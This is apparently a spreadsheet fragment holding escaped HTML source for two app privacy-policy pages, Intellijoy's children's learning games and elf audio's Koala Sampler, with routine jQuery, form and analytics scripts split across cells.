		$(this).blur(function(){
			clearText(this);
		});
	});
	$('.wpcf7-form textarea').each(function(){
		$(this).focus(function(){
			clearText(this);
		});
		$(this).blur(function(){
			clearText(this);
		});
	});
	$(".btn-slide").click(function(){
		$("#panel").slideToggle();
		$(this).toggleClass("active"); return false;
	});
});
&lt;/script&gt;
&lt;!-- SCRIPTS for textarea --&gt;
&lt;script type="text/javascript"&gt;
function clearText(field){
	if (field.defaultValue == field.value){
		field.value = '';
	}
	else if (field.value == ''){
		field.value = field.defaultValue;
	}
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body class="inner_bg"&gt;
&lt;!-- SET: WRAPPER --&gt;
&lt;ul id="links" style="display:none;"&gt;
      	&lt;li rel="http://www.intellijoy.com/games/intellijoy-early-learning-academy/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/alive-alphabet-letter-tracing"&gt;&lt;/li&gt;
      	&lt;li rel=" http://www.intellijoy.com/games/kids-abc-phonics/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-abc-trains/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-abc-letters/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-learn-to-read/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-sight-words/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-learn-to-sort/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-learn-to-count/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-numbers-and-math/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-kindergarten-math"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/​kids-learn-shapes-2"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-telling-time/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/first-grade-math/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-tap-and-color/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-painting/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-draw-with-shapes/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-connect-the-dots/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-shape-puzzle/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-shape-puzzle-halloween/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-professions-dressing-game/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-learn-colors/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-animal/"&gt;&lt;/li&gt;
      	&lt;li rel="http://www.intellijoy.com/games/kids-learn-about-music/"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;style&gt;
.ad-image{
	cursor:pointer !</t>
  </si>
  <si>
    <t>important;
}
#navs{
	position:absolute;
	right:48%;
	bottom:26%;
	z-index:999999;
	color:black;
}
#navs li{
	float:left;
	width:10px;
	cursor:pointer;
	height:10px;
	background:url("http://www.intellijoy.com/wp-content/themes/10831/images/radio-btn.png") no-repeat left top;
	margin-left:7px;
}
.li-act{
	background:url("http://www.intellijoy.com/wp-content/themes/10831/images/radio-btn.png") no-repeat left -11px !important;
}
&lt;/style&gt;
&lt;input type="hidden" value="0" id="show-link" autocomplete="off"&gt;
&lt;input type="hidden" value="1" id="current-link" autocomplete="off"&gt;
&lt;script&gt;
	//$(document).ready(function(){
/*
		$(window).load(function() {
  		  $('.show-link').val(0);
		  $('.current-link').val(1);
		  console.log("!!!! ");
		});
*/
		var aaa = setInterval('waa()', 100);
		function waa(){
			var gal_width = $('.ad-gallery').width();
			var windown_width = $(window).width();
			var minus = eval(eval(gal_width-windown_width)/2);
			if(windown_width &lt; gal_width){
				$('.ad-gallery').css('margin-left', '-'+minus+'px');
				if(windown_width &gt; '1000'){
					$("body").css("overflow-x", "hidden");
				}else{
					$("body").css("overflow-x", "auto");
				}
			}else{
				$('.ad-gallery').css('margin-left', 'auto');
				$("body").css("overflow-x", "hidden");
			}
		}
	//});
&lt;/script&gt;
&lt;div class="wrapper"&gt;
    &lt;div id="panel" class="contact_wrapper" &gt;
        &lt;div class="container"&gt;
            &lt;div class="contact_form flt_Rt"&gt;
                &lt;h2 class=" flt_Lt"&gt;Contact</t>
  </si>
  <si>
    <t>Us&lt;/h2&gt;
                &lt;a href="#" class="flt_Rt btn-slide"&gt;&lt;img src="http://www.intellijoy.com/wp-content/themes/10831/images/close.jpg" width="13" height="14" alt=""&gt;&lt;/a&gt; &lt;span class="clear_0"&gt;&amp;nbsp;&lt;/span&gt;
                &lt;div class="wpcf7 no-js" id="wpcf7-f532-o1" lang="en-US" dir="ltr"&gt;
&lt;div class="screen-reader-response"&gt;&lt;p role="status" aria-live="polite" aria-atomic="true"&gt;&lt;/p&gt; &lt;ul&gt;&lt;/ul&gt;&lt;/div&gt;
&lt;form action="/privacy-policy#wpcf7-f532-o1" method="post" class="wpcf7-form init" aria-label="Contact form" novalidate="novalidate" data-status="init"&gt;
&lt;div style="display: none;"&gt;
&lt;input type="hidden" name="_wpcf7" value="532" /&gt;
&lt;input type="hidden" name="_wpcf7_version" value="5.7.2" /&gt;
&lt;input type="hidden" name="_wpcf7_locale" value="en_US" /&gt;
&lt;input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f532-o1" /&gt;
&lt;input type="hidden" name="_wpcf7_container_post" value="0" /&gt;
&lt;input type="hidden" name="_wpcf7_posted_data_hash" value="" /&gt;
&lt;input type="hidden" name="_wpcf7_recaptcha_response" value="" /&gt;
&lt;/div&gt;
&lt;ul&gt;
	&lt;li&gt;
		&lt;p&gt;&lt;span class="wpcf7-form-control-wrap" data-name="textarea-253"&gt;&lt;textarea cols="2" rows="2" class="wpcf7-form-control wpcf7-textarea" aria-invalid="false" placeholder="Leave a message" name="textarea-253"&gt;&lt;/textarea&gt;&lt;/span&gt;
		&lt;/p&gt;
	&lt;/li&gt;
	&lt;li&gt;
		&lt;p&gt;&lt;span class="wpcf7-form-control-wrap" data-name="email-32"&gt;&lt;input size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email txt_input" aria-required="true" aria-invalid="false" placeholder="Your email" value="" type="email" name="email-32" /&gt;&lt;/span&gt;
		&lt;/p&gt;
	&lt;/li&gt;
	&lt;li&gt;
		&lt;p&gt;&lt;span class="wpcf7-form-control-wrap" data-name="text-366"&gt;&lt;input size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required txt_input" aria-required="true" aria-invalid="false" placeholder="Your name" value="" type="text" name="text-366" /&gt;&lt;/span&gt;
		&lt;/p&gt;
	&lt;/li&gt;
	&lt;li&gt;
		&lt;p&gt;&lt;span class="wpcf7-form-control-wrap" data-name="subject"&gt;&lt;input size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required txt_input" aria-required="true" aria-invalid="false" placeholder="Subject" value="" type="text" name="subject" /&gt;&lt;/span&gt;
		&lt;/p&gt;
	&lt;/li&gt;
	&lt;li&gt;
		&lt;p&gt;&lt;input class="wpcf7-form-control has-spinner wpcf7-submit send_btn" type="submit" value="Send" /&gt;
		&lt;/p&gt;
	&lt;/li&gt;
&lt;/ul&gt;&lt;div class="wpcf7-response-output" aria-hidden="true"&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;
            &lt;/div&gt;
            &lt;span class="clear_0"&gt;&amp;nbsp;&lt;/span&gt; &lt;/div&gt;
    &lt;/div&gt;
    &lt;!-- SET: HEADER --&gt;
    &lt;div id="header"&gt; 
        &lt;!-- SET: CONTAINER --&gt;
        &lt;div class="container"&gt;
            &lt;div class="header"&gt;
                &lt;div class="logo flt_Lt"&gt; &lt;a href="http://www.intellijoy.com/"&gt;&lt;img src="http://www.intellijoy.com/wp-content/themes/10831/images/logo.jpg" width="98" height="26" alt=""&gt;&lt;/a&gt; &lt;/div&gt;
                &lt;div class="nav flt_Rt"&gt;
					&lt;ul id="menu-top_menu" class="menu"&gt;&lt;li id="menu-item-44" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-44"&gt;&lt;a href="http://www.intellijoy.com/games"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-793" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-793"&gt;&lt;a href="http://www.intellijoy.com/blog"&gt;Blog&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-813" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-813"&gt;&lt;a href="http://www.intellijoy.com/team"&gt;Our Team&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-403" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-403"&gt;&lt;a href="http://www.intellijoy.com/why-us"&gt;Why Intellijoy&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-53" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53"&gt;&lt;a href="http://www.intellijoy.com/contact-us"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;                &lt;/div&gt;
                &lt;span class="clear_0"&gt;&amp;nbsp;&lt;/span&gt; &lt;/div&gt;
        &lt;/div&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>END: CONTAINER --&gt; 
    &lt;/div&gt;
    &lt;!-- END: HEADER --&gt;
	  &lt;div class="slider"&gt; &lt;/div&gt;
    &lt;!-- SET: WRAPPER2 --&gt;
    &lt;div class="wrapper2"&gt; 
        &lt;!--</t>
  </si>
  <si>
    <t>SET: CONTAINER --&gt;
        &lt;div class="container"&gt; 
            &lt;!-- SET: MAIN CONTENT --&gt;
            &lt;div class="main_content"&gt;
                &lt;div class="testimonial1"&gt;
                    &lt;h1&gt;Privacy Policy&lt;/h1&gt;
                    &lt;div class="info_developer page_cont" &gt;
                        &lt;p&gt;&lt;span style="color: #333399;"&gt;&lt;em&gt;Last updated: February 22, 2021&lt;/em&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Intellijoy’s privacy policy is very simple.&lt;/p&gt;
&lt;p&gt;Our apps DO NOT collect ANY information.&lt;/p&gt;
&lt;p&gt;Period.&lt;/p&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
            &lt;!-- END: MAIN CONTENT --&gt; 
        &lt;/div&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>END: CONTAINER --&gt; 
    &lt;/div&gt;
    &lt;!-- END: WRAPPER2 --&gt; 
_x005F_x000D_
   _x005F_x000D_
    _ x000D_
&lt;div class="push"&gt;&amp;nbsp;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>END: WRAPPER --&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- SET: WRAPPER3 --&gt;_x005F_x000D_
    &lt;div class="wrapper3"&gt; _x005F_x000D_
        &lt;!-- SET: footer --&gt;_x005F_x000D_
        &lt;div id="footer"&gt;_x005F_x000D_
            &lt;div class="footer_nav flt_Lt"&gt;_x005F_x000D_
				&lt;ul id="menu-footer_menu1" class="menu"&gt;&lt;li id="menu-item-54" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-54"&gt;&lt;a href="http://www.intellijoy.com"&gt;Home&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"&gt;&lt;a href="http://www.intellijoy.com/games"&gt;All Games&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;li id="menu-item-797" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-797"&gt;&lt;a href="http://www.intellijoy.com/blog"&gt;Blog&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;li id="menu-item-812" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-812"&gt;&lt;a href="http://www.intellijoy.com/team"&gt;Our Team&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;li id="menu-item-794" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-794"&gt;&lt;a href="http://www.intellijoy.com/why-us"&gt;Why Intellijoy&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;li id="menu-item-795" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-795"&gt;&lt;a href="http://www.intellijoy.com/testimonials"&gt;Testimonials&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;li id="menu-item-796" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-445 current_page_item menu-item-796"&gt;&lt;a href="http://www.intellijoy.com/privacy-policy" aria-current="page"&gt;Privacy Policy&lt;/a&gt;&lt;span&gt; / &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;				&lt;?php// wp_nav_menu( array('menu' =&gt; 'footer_menu2', 'container' =&gt; '', 'after' =&gt; '&lt;span&gt; / &lt;/span&gt;' )); ?&gt;_x005F_x000D_
				                _</t>
  </si>
  <si>
    <t>x000D_
            &lt;/div&gt;_x005F_x000D_
_ x000D_
            &lt;div class="copy flt_Rt"&gt; Copyright &amp;copy; Intellijoy, 2021 &lt;/div&gt;_x005F_x000D_
            &lt;span class="clear_0"&gt;&amp;nbsp;&lt;/span&gt; &lt;/div&gt;_x005F_x000D_
        &lt;!--</t>
  </si>
  <si>
    <t>END: footer --&gt; _x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
    &lt;!-- END: WRAPPER3 --&gt; _x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-includes/js/comment-reply.min.js?ver=6.1.1' id='comment-reply-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.2' id='swv-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='contact-form-7-js-extra'&gt;
/* &lt;! [CDATA[ */
var wpcf7 = {"api":{"root":"http:\/\/www.intellijoy.com\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.2' id='contact-form-7-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='qppr_frontend_scripts-js-extra'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">[CDATA[ */
var qpprFrontData = {"linkData":{"http:\/\/www.intellijoy.com\/kids-numbers-and-math-ios":[0,0,"http:\/\/itunes.apple.com\/us\/app\/kids-numbers-and-math\/id471989878"],"http:\/\/www.intellijoy.com\/kids-connect-the-dots-xmas-ios":[0,0,"http:\/\/itunes.apple.com\/en\/app\/kids-connect-the-dots-xmas\/id488074291"]},"siteURL":"http:\/\/www.intellijoy.com","siteURLq":"http:\/\/www.intellijoy.com"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.3' id='qppr_frontend_scripts-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6LdNNrEjAAAAAHz5UXUz-hyVUrvvIIws0fnCFaZ9&amp;#038;ver=3.0' id='google-recaptcha-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='wpcf7-recaptcha-js-extra'&gt;
/* &lt;! [CDATA[ */
var wpcf7_recaptcha = {"sitekey":"6LdNNrEjAAAAAHz5UXUz-hyVUrvvIIws0fnCFaZ9","actions":{"homepage":"homepage","contactform":"contactform"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.2' id='wpcf7-recaptcha-js'&gt;&lt;/script&gt;
_x005F_x000D_
&lt;script&gt;_x005F_x000D_
	$(document).ready(function(){_x005F_x000D_
		$('.ad-gallery').append('&lt;div id="navs"&gt;&lt;ul&gt;&lt;li class="li-act"&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;li&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;');_x005F_x000D_
_x005F_x000D_
		$('#navs li').on('click', function(){_x005F_x000D_
_x005F_x000D_
var activeIndex = $('.li-act').index();_x005F_x000D_
var currentIndex = $(this).index();_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
			$('#navs li').each(function(){_x005F_x000D_
_x005F_x000D_
				$(this).removeClass('li-act');_x005F_x000D_
_x005F_x000D_
			});_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
			$(this).addClass('li-act');_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
var width = 900;_x005F_x000D_
_x005F_x000D_
if(currentIndex &gt; activeIndex)_x005F_x000D_
{_x005F_x000D_
	var diff = currentIndex - activeIndex;_x005F_x000D_
	var left = $('.ad-thumbs').scrollLeft() + (width*diff);_x005F_x000D_
	$('.ad-thumbs').animate({scrollLeft: left +'px'});_x005F_x000D_
_x005F_x000D_
}_x005F_x000D_
else if(activeIndex &gt; currentIndex )_ x000D_
{_x005F_x000D_
	var diff = activeIndex - currentIndex;_x005F_x000D_
	var left = $('.ad-thumbs').scrollLeft() - (width*diff);_x005F_x000D_
	$('.ad-thumbs').animate({scrollLeft: left +'px'});_x005F_x000D_
_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
/*_x005F_x000D_
			if($(this).index() == 0){_x005F_x000D_
				$('.ad-back').click();_x005F_x000D_
			}else{_x005F_x000D_
				$('.ad-forward').click();	_x005F_x000D_
			}_x005F_x000D_
*/_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
		});_x005F_x000D_
	});_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;html&gt;
&lt;head&gt;
	&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;
	&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-321213-5"&gt;&lt;/script&gt;
	&lt;script&gt;
	  window.dataLayer = window.dataLayer || [];
	  function gtag(){dataLayer.push(arguments);}
	  gtag('js', new Date());
	  gtag('config', 'UA-321213-5');
	&lt;/script&gt;
&lt;!--
  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, nosy parker.
           ___    .-.
          (   )  /    \
  .--.    </t>
  </si>
  <si>
    <t xml:space="preserve">| |   | . `. ;
 /    \   | |   | |(___)
|  .-. ;  | |   | |
|  | | |  | |  (   __)
|  |/  |  | |   | |
|  ' _.'  </t>
  </si>
  <si>
    <t xml:space="preserve">| |   | |
|  .'.-.   | |   | |
'  `-' /  | |   | |
 `.__.'  (___) (___)
    a  u  d  </t>
  </si>
  <si>
    <t>i  o
--&gt;
	&lt;title&gt;elf audio - koala sampler - privacy policy&lt;/title&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;	
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, user-scalable=yes"&gt;
    &lt;meta name="keywords" content="sampler,audio,music,vst,ios,ipad,iphone,synthesizer,koala,sampletoy"&gt;
    &lt;meta name="description" content="We make musical instruments for iOS and other platforms. Koala Sampler is a super intuitive audio sampler for making beats in seconds. "&gt;
    &lt;meta property="og:title" content="elf audio instruments"&gt;
    &lt;meta property="og:description" content="We make musical instruments for iOS and other platforms.</t>
  </si>
  <si>
    <t>Koala Sampler is a super intuitive audio sampler for making beats in seconds. "&gt;
    &lt;meta property="og:url" content="https://www.elf-audio.com/"&gt;
    &lt;meta property="og:type" content="website"&gt;
    &lt;meta property="og:site_name" content="elf audio instruments"&gt;
    &lt;meta property="og:image" content="https://www.elf-audio.com/img/og-image.png"&gt;
	&lt;link rel="icon" type="image/png" href="/favicon.png"&gt;
	&lt;link href="https://fonts.googleapis.com/ css?family=Quicksand:500" rel="stylesheet"&gt;
	&lt;link type="text/css" rel="stylesheet" href="/css/simplelightbox.min.css" media="all" /&gt;
	&lt;link type="text/css" rel="stylesheet" href="/css/pure.css" media="all" /&gt;
	&lt;link type="text/css" rel="stylesheet" href="/css/puregrids-responsive-min.css" media="all" /&gt;
	&lt;link type="text/css" rel="stylesheet" href="/css/style.css" media="all" /&gt;
	&lt;link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous"&gt;
	&lt;script language="javascript" src="/js/jquery-3.3.1.min.js"&gt;&lt;/script&gt;
	&lt;script language="javascript" src="/js/simple-lightbox.min.js"&gt;&lt;/script&gt;
	&lt;script language="javascript" src="/js/elf.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body class="mini"&gt;
		&lt;header&gt;
			&lt;a href="/"&gt;&lt;img alt="elf audio logo" title="elf audio" src="/img/logo.svg" id="logo" 
				class="hoverSpin" /&gt;&lt;/a&gt;
		&lt;/header&gt;
		&lt;div id="content"&gt;
&lt;style type="text/css"&gt;
	#privacy {
		max-width: 700px;
		margin:0 auto;
		padding:</t>
  </si>
  <si>
    <t xml:space="preserve">0 1em;
	}
	h2 {
		font-size: 1.5em;
		color: #FFF7D0;
		margin-bottom:0.5em;
		margin-top: 2em;
	}
&lt;/style&gt;
&lt;div id="privacy"&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;
MAZBOX LTD. built the Koala Sampler app as a Commercial app. This SERVICE is provided by MAZBOX LTD. and is intended for use as is.
 &lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our policies with the collection, use, and disclosure of Personal Information if anyone decided to use our Service.
 &lt;/p&gt;
&lt;p&gt;
If you choose to use our Service, then you agree to the collection and use of information in relation to this policy. The Personal Information that we collect is used for providing and improving the Service.</t>
  </si>
  <si>
    <t xml:space="preserve">We will not use or share your information with anyone except as described in this Privacy Policy.
 &lt;/p&gt;
&lt;p&gt;
 The terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, which is accessible at Koala Sampler unless otherwise defined in this Privacy Policy.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;h2&gt;Information Collection and Use&lt;/h2&gt;
&lt;p&gt;
 For a better experience, while using our Service, we may require you to provide us with certain personally identifiable information. The information that we request will be retained by us and used as described in this privacy policy.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;p&gt;
 The app does use third party services that may collect information used to identify you.
 &lt;/p&gt;
&lt;p&gt;
Link to privacy policy of third party service providers used by the app
&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href="https://www.apple.com/legal/privacy/en-ww/"&gt;Apple Privacy Policy&lt;/a&gt;
&lt;h2&gt;Log Data&lt;/h2&gt;
&lt;p&gt;
 We want to inform you that whenever you use our Service, in a case of an error in the app we collect data and information (through third party products) on your phone called Log Data. This Log Data may include information such as your device Internet Protocol (“IP”) address, device name, operating system version, the configuration of the app when utilizing our Service, the time and date of your use of the Service, and other statistics.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;h2&gt;Cookies&lt;/h2&gt;
&lt;p&gt;
Cookies are files with a small amount of data that are commonly used as anonymous unique identifiers. These are sent to your browser from the websites that you visit and are stored on your device's internal memory.
 &lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>This Service does not use these “cookies” explicitly. However, the app may use third party code and libraries that use “cookies” to collect information and improve their services. You have the option to either accept or refuse these cookies and know when a cookie is being sent to your device.</t>
  </si>
  <si>
    <t xml:space="preserve">If you choose to refuse our cookies, you may not be able to use some portions of this Service.
 &lt;/p&gt;
&lt;h2&gt; Service Providers&lt;/h2&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>We may employ third-party companies and individuals due to the following reasons:
&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;To facilitate our Service;&lt;/li&gt;
&lt;li&gt;To provide the Service on our behalf;&lt;/li&gt;
&lt;li&gt;To perform Service-related services; or&lt;/li&gt;
&lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
 We want to inform users of this Service that these third parties have access to your Personal Information.</t>
  </si>
  <si>
    <t xml:space="preserve">The reason is to perform the tasks assigned to them on our behalf. However, they are obligated not to disclose or use the information for any other purpose.
 &lt;/p&gt;
&lt;h2&gt;Security&lt;/h2&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>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&lt;/p&gt;
&lt;h2&gt;Links to Other Sites&lt;/h2&gt;
&lt;p&gt;
 This Service may contain links to other sites.</t>
  </si>
  <si>
    <t>If you click on a third-party link, you will be directed to that site. Note that these external sites are not operated by us. Therefore, we strongly advise you to review the Privacy Policy of these websites.</t>
  </si>
  <si>
    <t>We have no control over and assume no responsibility for the content, privacy policies, or practices of any third-party sites or services.
 &lt;/p&gt;
&lt;h2&gt;Children’s Privacy&lt;/h2&gt;
&lt;p&gt;
These Services do not address anyone under the age of 13. We do not knowingly collect personally identifiable information from children under 13.</t>
  </si>
  <si>
    <t>In the case we discover that a child under 13 has provided us with personal information, we immediately delete this from our servers. If you are a parent or guardian and you are aware that your child has provided us with personal information, please contact us so that we will be able to do necessary actions.
 &lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>Changes to This Privacy Policy&lt;/h2&gt;
&lt;p&gt;
 We may update our Privacy Policy from time to time. Thus, you are advised to review this page periodically for any changes.</t>
  </si>
  <si>
    <t xml:space="preserve">We will notify you of any changes by posting the new Privacy Policy on this page. These changes are effective immediately after they are posted on this page.
 &lt;/p&gt;
&lt;h2&gt;Contact Us&lt;/h2&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact us.
 &lt;/p&gt;
&lt;/div&gt;
	&lt;/div&gt;
	&lt;footer&gt;
		&lt;ul&gt;
    		&lt;li&gt;&amp;copy; elf audio 2021&lt;/li&gt;
    		&lt;li&gt;&lt;a href="/contact.php"&gt;Contact&lt;/a&gt;&lt;/li&gt;
    		&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t xml:space="preserve">href="/about.php"&gt;About&lt;/a&gt;&lt;/li&gt;
    		&lt;li&gt;&lt;a href="/jobs.php"&gt;Jobs&lt;/a&gt;&lt;/li&gt;
    		&lt;li&gt;&lt;a href="https://www.twitter.com/elf_audio"&gt;&lt;i class="fab fa-twitter"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
		&lt;li&gt;&lt;a href="https://www.instagram.com/elf_audio"&gt;&lt;i class="fab fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.facebook.com/elfaudioapps"&gt;&lt;i class="fab fa-facebook"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
		&lt;li&gt;&lt;a href="https://www.youtube.com/c/elfaudio"&gt;&lt;i class="fab fa-youtube"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
			&lt;li&gt;&lt;a href="/mailing-list.php"&gt;Join the mailing list&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
